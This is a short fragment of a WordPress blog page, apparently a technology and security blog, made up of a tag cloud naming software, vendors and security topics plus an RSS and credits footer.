    Tag

    .net adobe Apple Blog browser bug chrome chromium compact cracking driver exploit firefox fix flash framework google http incomedia intel internet explorer 8 iphone linux malware micro Microsoft mozilla necko office OpenOffice 3.1 OpenSource patch php samba security squirrelmail twitter ubuntu update web windows windows ce worm www xss
    rss Commenti RSS valid xhtml 1.1 design by jide powered by Wordpress get firefox